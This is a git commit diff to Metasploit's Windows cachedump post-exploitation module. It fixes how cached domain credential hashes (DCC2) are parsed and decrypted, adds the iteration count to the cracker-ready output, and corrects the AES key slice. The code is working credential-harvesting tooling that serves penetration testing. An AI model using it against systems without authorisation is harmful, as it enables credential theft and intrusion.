Land rapid7#8580, cachedump iteration count fix

David Maloney · David Maloney · commit 722d9a278c9c · 2017-06-19T14:04:07.000-05:00
lands rogdham's fixes for the ms cache dump post module
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
@@ -64,6 +64,15 @@ def parse_decrypted_cache(dec_data, s)
     vprint_good "Username\t\t: #{username}"
     vprint_good "Hash\t\t: #{hash.unpack("H*")[0]}"
 
+    if lsa_vista_style?
+      if (s.iterationCount > 10240)
+        iterationCount = s.iterationCount & 0xfffffc00
+      else
+        iterationCount = s.iterationCount * 1024
+      end
+      vprint_good "Iteration count\t: #{s.iterationCount} -> real #{iterationCount}"
+    end
+
     last = Time.at(s.lastAccess)
     vprint_good "Last login\t\t: #{last.strftime("%F %T")} "
 
@@ -152,6 +161,7 @@ def parse_decrypted_cache(dec_data, s)
         [
           username,
           hash.unpack("H*")[0],
+          iterationCount,
           logonDomainName,
           dnsDomainName,
           last.strftime("%F %T"),
@@ -168,7 +178,7 @@ def parse_decrypted_cache(dec_data, s)
 
     vprint_good "----------------------------------------------------------------------"
     if lsa_vista_style?
-      return "#{username.downcase}:$DCC2$##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+      return "#{username.downcase}:$DCC2$#{iterationCount}##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     else
       return "#{username.downcase}:M$#{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     end
@@ -195,6 +205,7 @@ def parse_cache_entry(cache_data)
       :revision,
       :sidCount,
       :valid,
+      :iterationCount,
       :sifLength,
       :logonPackage,
       :dnsDomainNameLength,
@@ -228,7 +239,8 @@ def parse_cache_entry(cache_data)
 
     s.revision = cache_data[40,4].unpack("V")[0]
     s.sidCount = cache_data[44,4].unpack("V")[0]
-    s.valid = cache_data[48,4].unpack("V")[0]
+    s.valid = cache_data[48,2].unpack("v")[0]
+    s.iterationCount = cache_data[50,2].unpack("v")[0]
     s.sifLength = cache_data[52,4].unpack("V")[0]
 
     s.logonPackage  = cache_data[56,4].unpack("V")[0]
@@ -253,7 +265,7 @@ def decrypt_hash(edata, nlkm, ch)
 
   def decrypt_hash_vista(edata, nlkm, ch)
     aes = OpenSSL::Cipher.new('aes-128-cbc')
-    aes.key = nlkm[16...-1]
+    aes.key = nlkm[16...32]
     aes.padding = 0
     aes.decrypt
     aes.iv = ch
@@ -275,6 +287,7 @@ def run
     [
       "Username",
       "Hash",
+      "Hash iteration count",
       "Logon Domain Name",
       "DNS Domain Name",
       "Last Login",
@@ -319,7 +332,7 @@ def run
 
       vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
 
-      print_status("Obtaining LK$KM...")
+      print_status("Obtaining NL$KM...")
       nlkm = capture_nlkm(lsakey)
       vprint_status("NL$KM: #{nlkm.unpack("H*")[0]}")
 
@@ -329,7 +342,7 @@ def run
       john = ""
 
       ok.enum_value.each do |usr|
-        if( "NL$Control" == usr.name) then
+        if ( !usr.name.match(/^NL\$\d+$/) ) then
           next
         end
 
